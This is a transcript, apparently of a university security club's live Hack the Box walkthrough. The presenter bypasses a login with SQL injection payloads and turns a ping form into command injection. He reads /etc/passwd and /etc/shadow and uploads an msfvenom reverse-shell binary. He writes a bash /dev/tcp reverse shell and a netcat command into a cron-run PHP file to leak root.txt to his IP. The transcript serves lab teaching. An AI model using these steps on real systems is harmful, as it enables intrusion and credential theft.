I'll give it a paste what I have and say, here's all the things to try in those two fields. And I'll say attack type, because I want them to go to the same thing, I'm actually do a battengram, which says send the same payload in each one. A sniper will like brute force it and try one combination with all the other ones to rotate it, kind of like a brute force. But usually one of them is only exploitable, and this will be quicker as well. Burp free is limited, so I will, it will slow down the more you get, and it will try all these exploits. And we can see something noticeable, very interesting here as well. We can see the length of these differ. What that means is the request that we get back is different in some way than anything else. So we can see most of these are 1887. So like a blank one, which is probably not going to be an injection, is 1887. Trying these, we get 1887. But this one right here, we see 1852, or this one here as well. We see these two attacks seem to do something. They give us a different response back, actually view the response. With this one right here, 1852, I get something, 302 found. So I'm not getting, I'm getting a redirect saying, okay, those credentials work, and you're now being brought to welcome.php, which is a different page that we can access. And we get a login page to render it. We don't get a passwords are incorrect here. Burp does not follow the redirect, so it just gets back to the home page, but it doesn't get an error back. And we actually run all 46 attacks by now. So we can filter by length and see which ones worked. And we can see these ones worked, whereas these ones did not, because the length is different, right? So looking for the outlier, if we know what doesn't work, we know what bad looks like. So anything differing from the bad must be good. Or more generally speaking, if I know what doesn't work gives me the same result, and something I try gives me a different result, that other thing is different. So I'll try some of these. The first one, admin parentheses star. I'll just type it in, I guess. I can copy and paste that. That's what I'm looking for. Give me this. So I just took some guy's code saying all of these made SQL injections, and I said, I don't know which one's going to work. Let's try all of them. So back in my login page, I will try these both. And I get a login page. I'm back. I've bypassed authentication. What am I looking at? I see a net tool, some bad code, I think, because it's red, because that means it's not valid. Option value trace route, value ping. Let me make this larger. So I can actually see, oh, that's fancy. So this is PHP page. So it's running server-side code in the background. So this is probably where we get to the exploiting stage. Server-side code, I can't see. That's PHP. It is only, I can only see the information sending to the PHP. So I can see the option value are system commands. And when you're pen testing, a system administration background is actually very helpful here because I know what these commands are. Trace route is a command to basically trace the route your packet takes throughout the network. If you're on Linux, you can just type that into your system. If you're on Windows, it's trace RT, shortenated trace route. Ping C1 says send a ping of one ping attempt. Clean out my tabs. So we're submitting a page saying input type text value host. So it appears that the drop-down menu, because it's a select box, is sending these two commands to the server, trace route or ping. So it's probably sending a ping to like 8.8. These hack the boxes can't access the internet. So it's not going to return anything. It probably just times out or stangs. There you go. Packet loss because you can't access the internet. Question was asked if other logins would take you to different pages. I don't think they would. It's all referencing the same database. So if the database calls back as good credentials, the website brings me to welcome.php. I don't think any of that would be useful. We can actually look at an intruder. We can see the pretty mode. We can see the location it sends us is actually the same, welcome.php. So for all of those that do work, so they all go to the same location. We didn't get in yet, but I think we're close. So this will probably go give us RCE. So this here basically selects the command you send and the parameters you get. So because it's HTML, we might be able to edit our client HTML to give a different command and change the post request. So what I'll do is use burp for that rather than like inspect element. So I'll go to my proxy settings and hopefully, and this should work. That's already set actually. Go back to my target and say welcome to PHP. Parameters is, oh, there's a command, ping and host, right? So the host name is hard coded, which means being passed as a parameter. So you can see right here the command is being sent. So if I give it I can edit it because I'm not an intruder. Intruder. Nope, not intruder. We have to send a repeater because I want to send repeated requests with different things. So in here, let's try again, repeater, and I'll send that as is. If you have timeout, I sort of changed it. And see if we can edit the request we're sending to the server to say, instead of pinging something, let's try something else. Let's wait for it to do the ping, and I'll do the pretty because it's much easier to see. And it's just sending this data raw in. So we can say, instead of ping, let's try a ls, right? And I'll give it no arguments because it takes none. I'll do it type al and see if that does what I think it does. So if I send this, I can now get remote code execution on this machine. And I can see things like that. So the command I'll run instead of this is a cat, which reads files on the system. And a globally file I can read is etc password. It doesn't contain passwords. It used to, but they changed how it works, but kept the name. This will give us a list of all users on the system. So we can see these are all service users, nothing of use. MySQL, bin false means we can't log into these anyway. So the only thing that we can log into is bin bash with this guy, Noelis. Cool. So we can confirm that by doing an ls al etc home, and basically view as home directories. And we can see the only user on here is Noelis. There's no like user folder here that's not in password, so it's there. On my root, owned by him. It actually seems that we can read his directory structure, which is weird. Who are we? Basically checking who are we logged in as, right? Who's the web server running as? Who am I? We're running as www data, which is Apache. So the Apache user can read his home directory, which is not normal configured. That's bad security. So don't do that when you set up websites. So since I can read his home directory, let's just browse into it. Oops, can't do enter, gotta hit send. I can see his information now. So on Hack the Box, one of the things that you get are flags that we're looking for. So yeah, someone already saw it already. User.txt is where we get the user flag, and we've achieved user level access. After that, we can go for root.txt, which is the root flag. And once you get root flag, then we own the box and have root access. And I can wipe the thing if we want, but probably not. So what I'll go ahead and do is just read that file. I'll cat, could have kept that home, nolus, user.txt. And that's the user flag. So that's just a hash of something. It's not really useful here. We've got the first user flag, right? So this is all fun and all, but how do we get something useful that's not like me sending commands back and forth? So because I have remote code execution on the machine, let's do something a bit more advanced. I'll try to inject my own custom payload into this. So in my terminal, I will open a new terminal, Control-Shift+, and I'll cd hack the box Chronos. And I'll use Metasploit to get a shell in this box. There's other ways to do it, but I'll do the fancy one. So MSF Venom will generate a custom payload that we specify. The payload that we want is going to be Linux x64, because the Chronos is a Linux machine, Peter, and I'll say reverse TCP. Lhost is going to be my host, so I need my IP address. 10.10.14. Basically, what this is saying is I'm getting a binary that, when run, will connect back to my machine and give me a interpreter shell, which is a shell of all fancy things. I'll use 4545 as my hacker port, and my format is going to be ELF, which is a Linux binary. That's equivalent to an exe file on Windows. And then my output file is going to be type O for output is going to be a hack. Assuming I spelled everything correctly. And then in the meantime, while that generates, I will open a new terminal and open up MSF console. And so we get the multiple windows. Control-Shift+. MSF Venom is not the command line version of MSF console. They're actually both command line tools. What MSF Venom is a payload generator. So I can generate my own payloads rather than use the ones built into Metasploit and connect back to Metasploit. It's not just Interpreter, it's any payload I want. It's the ones on my system. I can create my own custom binary as well and specify that as a payload and do all kinds of stuff. Invalid payload, Linux x64 interpreter. Well, your comment was my spelling, not actually interpreter. Was it? Interpreter. Spelling is hard. So in here, to actually use this exploit, I'll say use exploit multi-handler. Show options, set L port, same as in my config file, set L host. And I'm running up on time, but hopefully I'll speed through this a bit. Getting root is usually easy once you get user. L host, I'll specify it to my interface, my VPN interface, and then it automatically resolves that for me. That's information. Set payload, I have to match that as well. Linux x86. I hit tab, so it's going to try and resolve that. Interpreter, reverse TCP. And then I will run that. That's going to be basically saying wait for the file to be run. So now that I have the hack file, file hack, it's of type binary, right? So I have to get this to the machine. I could do let's see. I'll do a web server, because that's usually the easiest. So in here, I'll say Python, and now Python is a scripting language, of course, but it has its own modules. One of the modules is a website. And with this command, I can just run a web server. Oh no. Simple HTTP server?
I think it's Python 3.
Python 3, is it? Oh no, that's not a thing on Parrot is weird. Okay, not Python. Good old Netcat, I suppose. Netcat listen on port. Let's see, I'm sorry, give me 1 second. Just real quick. Okay, so Netcat listen on port 400, because 4545 is already taken, 4000 actually. listen on port 4000 and read in the file hack. Yes. Okay. And then I'll take my IP address. And then back on the website, I'm going to, or back on burp, I'm going to download that file. So command is going to be netcat again, and the arguments for that will be my IP address, 4000, and I will output that file to a place I can read, which is going to be temp, not malware. And I will send that. And the question is, did that work? I didn't log my session, so I don't know. Hopefully I did. I can then use the ls command and check. ls temp malware, AL, give it to me. And is that there? It is there. Okay. So now I have to basically make it executable. Chmod plus X says the X stands for executable. Don't think about it too much. And now it should be executable. And I'll just run this. I believe I have to run this with a. Can I just do a? I think just that will actually run it. No, maybe it's in the wrong syntax. There's a command instead of the argument. Doesn't like that. Still put it 0 bytes. Is that what happened? Plus.al. If not, we have to go without a shell. Temp. Not malware. It's there. Oh, it's not executable. Chmod plus X / temp, not malware. And then I'll do a. This is fun, I know. AL, I'm just going to verify that it's executable, and then we can actually get a shell on this box of use. It's not being executable.
It is 0 bytes. You go to the file size, it didn't upload properly.
Can I just find it with bash? All right, so I have to upload it properly. So with that, it's going to be netcat 1010 saved. It's not saved. 1010 1417 1010 1417 is better work. 4000. Oh, I'm not doing the thing. In this has to be a TAC port. TAC port 4000. Export to temp malware. Send. Let me actually do some clever here and actually. Oh, it closed my session, so it took it. And then in here, sorry for
your own session.
Did I control C that?
Yes, there's a control C.
Oh, that explains it. Let me actually do it this way. VL. So I'll see if it actually responds to me. Instead of what I've done before. Send. Cool. That's fun. Bash bang. That's fancy. Netcat tech port. Can I do it all here? 10, 10, 14, 17. Tech port 4000. And just say do that. Inverse host lookup failed, unknown host. Oh, I'm dumb. The P goes here. Let's sync on 4000. There you go. There you go. Let's let them do it. I'll get there eventually. We've got a few minutes. Let's see. This should work. Host equals 10, 10, 14, 17. 14, what's my IP address? 14, 17 on port 4000. I'm upset. It's probably a URL escape thing. In here, let's send it as a raw URL rather than the raw commands because it's just going to be garbage. So what I can do is just turn off Burp for this. Intruder, because I know what it's doing at the back end, I'll just do this the non-GUI way. I'll do it. In here, we'll try something else. In preferences, we'll just turn off proxy and do it the old-fashioned way. So it's running commands, garbage data, doesn't matter. In bash, you want to concatenate strings. I'm rushing because I want to get to root in time. Colon basically says run a command, whatever, and then run this command afterwards. So if I do ls stack al, I should then get that, okay? So garbage data, colon, and this will URL encode it for me. So if you're not familiar with that, special characters get sent in different ways. Like a space is %20 on URL backend. This basically converts it for me. I could use CyberChef and convert it there, but I think it's being lost in translation. So I'll do it this way, and hopefully this works. So I'll do a netcat tech. I think it's just tech p. I think I'm using this right. So I'll say 10, 10, 17, 14, a tech p.
14, 17.
14, 17, thank you. 14, 17, tech p, 4000. Execute temp malware. Now it's real malware. And that did not work. VLP. It's not a good sign. Get out here. Is Netcat connect to host? What am I missing? I don't need this, but it'll be nice. I won't try too much. Netcat options host port. Ncat. Oh, I don't need TACP. Have I been lied to? Netcat 10, 10, 14, 17, 4000. Colon to temp malware. Oh, there we go. Connect to 10, 10, 14. Wait, that's something. So in here, colon, I was doing the wrong command entirely. Temp. Is it there? We've got malware and not malware. Malware is a 250 file size. So I'll make that executable. Chmod plus x temp malware. And then I'll just jump into it and say temp malware. Does that work? I don't think it did. Oh, we got something. So basically, I uploaded my own binary, had the server run that, and it should be sending stage, unless it died. Well, this is no fun. We'll do a manual the hard way. And hopefully I'm close to root, right? Whoops. Let's take AO. Why am I in caps lock? Etsy, what do we got in there? This is just all the config files. I can make this smaller for myself. Sorry about that. Shadow can't read. Roots only. Whatever. That's just not working today. So we do a live demo. We went this far. We do have cron, and I can read that file. So we'll look in those. So ls etsy cron tag d. Let me just copy this. mdm php copy. What is php? It's just a file. Cron tab list them please is the command here. Nothing there. Cat etsy cron tab is the generic one. We've got something here. Shell bin sh path yada yada. So this is a cron tab, and that's a task scheduler. So there's a command here running every single minute. Hour, minute, day of month, day of week. Those numbers are running here. The star means all of them. So every 60 seconds, we're running as the user root. The command is PHP, and the command is artesian. So that is a PHP payload there. If I can overwrite artesian, then I can get root in the box basically, because I can tell it instead of running the PHP function, run my own function. And I'll say ls like AO. and you can read. I can read and write. It's owned by me, and PHP is running it. So you need a PHP reverse shell, basically. And does that exist on Meterpreter already? Is the question. Does Addison know?
I think you'd be better off trying to get a shell as www data.
An actual shell. That's what we're trying to do.
Yes.
That's not. We're actually on time here. Let's see how we go. Interpreter PHP. Here's what I'll instead do. PHP reverse shell. When my code doesn't work, I'll take someone else's. PHP reverse shell. It's a whole thing and say shell basically saying that's what I want to run. What is this? Where's the documentation? That's a lot of code.
Yeah, PHP reverse shells are complicated, not really one line.
Oh, there is. There you go. That's a Python file. Bash tag I. What does that do? Is that a reverse shell? I'm gonna trust you. I'm sorry. Just can't pronounce your name, but I'll trust you. Netcat listen port on 4123. We listening on any 4123. So on here, I'll say in here, what am I looking for? This command. Bash. Let me just actually do this real quick. Can I can. IP 10, 10, 14, 17. 17 on port 4123. Aw. I might just run this. So here's what I'll do. I will completely cheese this and do the dumbest thing you'll think of. So I'll do it basically an asymmetrical terminal, right? So I'll run commands on one and read on the other. So on this command, on 4123, in here, I will pass the command echo. It's gonna be disgusting. First, let me cat etc cron tab. Hopefully this works on the first try. I'm going to echo the contents of that file into var www lar can I spell that? Artesian. It's not even a PHP file though, which is running PHP. So in here, bin bash tag c bash I dev tcp 10.0.0. He's running 10 10 10 1. I'm losing my mind. 14 17. Yes. Yes. On port 4123. 4123. And now can I cat etc cron tab. Let me just copy in clipboard. Let me read that file. Cat, if it's I can run it manually because PHP, right? So then that's fun. So
in your cat, you forgot the first slash, so it didn't actually show the file. It was looking for whatever the local home directory was.
cat for www. I have it pasted. That's in the file. All right, so that's not fun. That's just like not working. I think that bash command, I tried it before, didn't work. So we'll do something even better, right? So I'll take his, hopefully run it, hopefully get this done in the next like 2 minutes. And I'll exec, I will say, get rid of all of this. And I want a command that I know works. And I'll have to pipe this to, darn, I lost the file. I'm not good at this. Cat etchy cron tab. Almost there. Trust me. That's the file that we want to exploit. It's not even .php though, so I don't think it matters. So basically, I want to then take your code. I'll do it here so I can reference it. Take this man's code and basically make it a, I think here. So I'll say echo this into this. And instead of execing bin bash, I'll just go straight for the gold and say netcat 10, 10, 17, 14, 14, 17. I always screw that up. 14, 17, 14, 17. Yes, I have quotes and quotes, but it should work as long as they're not like weird quotes. If there's no more quotes anymore because I deleted his old thing, and I'll say my old one is 4123, 4123, and I'll read in the file root.root.txt because I know where it is because it's always in the same box on HackerBox. So this payload should then just like print to me on my terminal the actual root flag without actually getting root on the system if I can code correctly. So boom, boom, execute. And I wait the 1 minute for it to actually run every 60 seconds. And hopefully that's it. If it's not, I'm gonna be very upset. Give it 60 seconds. I just missed the time maybe. I hope this works. It should. Always on top. Oops, always on top. So I can change terminals. So what I'm doing is basically PHP file exec netcat. Aw. This is fun. Do the thing. For it counting down to the exact minute. If only it was that easy. Let me just cat the file. That should also run the PHP. Oh goodness, what is this? Allison, is this the actual exploit I have to do?
That might work, but it's not what I see.
Okay. Can I get a hint?
You really want a shell as www data. That's not the PHP thing.
It did not work. That's unfortunate. I don't need, I'll do this then. And then I'll say cat etsy. Is that even doing it right? I don't even know the actual proper syntax because it did run the PHP because it's not displaying on screen, which I have right here. Root.root.txt. Oh, because I'm PHP. I'm www data. I can't read. No, Artisan can. With one you wrote. That'll just read it back to me. So if I do Noelus. Oh, got it. There's root.
Oh, well, that was nice. That's definitely not what I see.
Yep. So basically what we did was when I ran the file, it didn't work because I invoked it as www data when I tried to read it on the command line there. So it wouldn't read the root file. It's not cheating. It got it. Okay, you really want to be that way. Let's,
that is totally a legitimate way to do it. So
Hold on.
I want to show you the way that I saw.
You want real? I'll give you real. Hold on.
What are you looking at now? With Etsy Shadow or something?
Yeah. So I had to wait the full minute for PHP to get. No, it's not what that I knew it was. It's always in root.root.txt. So here's what I'll show you then instead.
Yeah, there's never, unless it's Windows, which in that case it's maybe moved around.
It's in C users administrator root.txt.
Okay, true. User.txt is
It's a given. So I can't invoke the file myself. I have to wait the full minute. So there's your shadow file. No list. There's your password.
Okay, so could you do me a favor now on the box? So what you're supposed to do, according to the write-up, is view the file var www larvel app console kernel.php, which would have been in the root cron tab. And since you as data can read that for some reason.
Right.
And then that copies root.txt to var www admin writeup.root.txt. And I think you can read that.
Root.writeup. Well, my shell didn't work, so I just like, I'm here.
Yeah, well, the shell is interesting to get working. There is a way to URL encode in Burp Suite that you can do with just a keyboard shortcut, which would have helped. I've never seen that work, though. Uploading that file is very odd.
I'm gonna definitely work. Well, just wait a minute, then I'll get it's a long minute.
Yeah, it must be delayed on time-wise.
Right. Is it fair game to smack file on a shared lab machine? And I have now cat shadow. I have all your passwords. I can pump this to John, crack them, log in over SSH probably. So what I'll do just for fun, that's what is going on.
You can crack that password.
Instead of here, what I'll do then instead is temp malware. Execute elastic al temp, and now I've got root. So now it's here's what we're gonna do. We're gonna wait the minute, and then I'll get your the thing you said is impossible.
Finding root.txt is just like knowing where the valuable targets are. You know where like Etsy shadow is or whatnot. Just because you know where the valuable target is.
I'm gonna do it the right way. So the file I uploaded before previously, temp/malware, I'm going to have that now run under the PHP file. And now we have to wait the full minute, apparently, which is not a minute. It's just a bit slow. Oh, and look at that malware, setting stage 2. Please work, it should work. I totally did this malware, right? I've done malware before.
I think that specific shell just doesn't work.
It's plausible. Either way, I can upload a malware there, make it run. This should give me a root shell, then I can browse the system as normal. But for some reason, it's just straight up not doing Interpreter. Who knows? Maybe there's Windows Defender on it. That's possible. But any questions about what we've done today? Oh, someone mentioned about looking up files. You mean smack a file? You mean like overwrite the core file of the system? It's definitely fair game. It's kind of frustrating when you're doing a hack the box with shared people, and it's like not working for you, and people have messed up the box, and you reset them. But this is a retired box. I'm using a VPN profile for VIP, so this box is only mine. No one else is sharing it with me.
Yeah. That would be the commands for the reverse shell that would work. This is the only one that worked.
That's disgusting.
It is, but that's what you'd have to do.
Well, this should work, but it's a live demo. Once I go off Zoom, I'll get root like 12 different ways. But as we're doing this, we can find this video. This video will be posted on our web courses if you're a dues paying member, and edited on YouTube as well early next week. So if there's no more questions than that, just like 4 minutes over, not too bad. We can give me my. There we go. We can close out. So things had some trouble there, but eventually we got it through the most obscure way possible. If you've ever seen my code and how I do hack the box, it's not too far from how I do things. When something doesn't work, I just take the garbage shell I'm doing and just give it a long string of code to make it do something else. I can only really do that with experience. I'm not saying that's like the way you have to do it and something doesn't work, that's fine. If you're doing these boxes and you're having difficulty, that's normal. I've had great difficulty on multiple boxes. I have to give up on one of them. This was a lucky example where I was able to get it done, where it did not come me too much trouble that I cannot resolve. The more experience you have with this, the easier it's going to get. System administration experience definitely helped me out with some command syntax and ideas of going on. Yeah, Netcat. I don't know what was going on with that box. It just didn't like me. But we saw that send the payload. So the payload I created was just bad. But if I did make one better, I would have a root shell by now and full access to the box. I do have the passwords. I can then go offline and crack those, and then probably try over SSH to log into those. The DNS service seemed to be a red herring. Didn't have to use there. Addison, did your write-up use that DNS server?
Yeah, so you did GoBuster, but they used Dig by using that DNS server towards admin.hackthebox for finding the admin hack the box. They also found like NS1 or whatever the name server. That's what they did for Dig. You did GoBuster, which also worked just fine.
Okay.
That's what the DNS server was there for.
Right, probably
It's
get that.
clearly the one redirecting. It's not Apache doing virtual redirects. It is the DNS server redirecting to you various places.
Okay, well, it's only one page, I think, but anyway, that's more architecture on that one. But all right, if there's no more questions, we'll go ahead and close out. I'll give it a
Also, the SQL injection they used was slightly different. Someone mentioned about the comments. This is what they suggested that you use, which wasn't on your list that you found, but you found other ones that worked.
I think someone else gave that comment, but it didn't work.
Someone else gave it, but they put 1 dash in space and then 2 dashes, which is something different.
Okay. But there's
But
multiple
this is
ways
what they said worked for both username, and I don't think password actually matters. It's just comment the best password out.
Yep. Multiple ways to do this. As you can see, write-ups of mine differ, but that's all right. So it seems there's no more questions, so we'll go ahead and wrap this up. So if you're interested in attending our workshop tomorrow, I will be doing that on honeypots. Again, quick reminder, the one last week, we'll be revisiting that one, looking at some new information. And if you want to set up your own honeypot, I have a special treat for y'all if you show up tomorrow, or as well as it's on my GitHub. The entire process is now automated. So you can set up your own GitHub for your own honeypot for like malware analysis and fun stuff. So be sure to tune into the workshop tomorrow, and we'll go into a little deep dive into honeypots of our own. So with that, and I'll give you your Friday back. Thank you so much for staying through this and attending our Friday meetings. I'll see you tomorrow, hopefully. If not, we'll meet up next Friday. So until then, have a good one.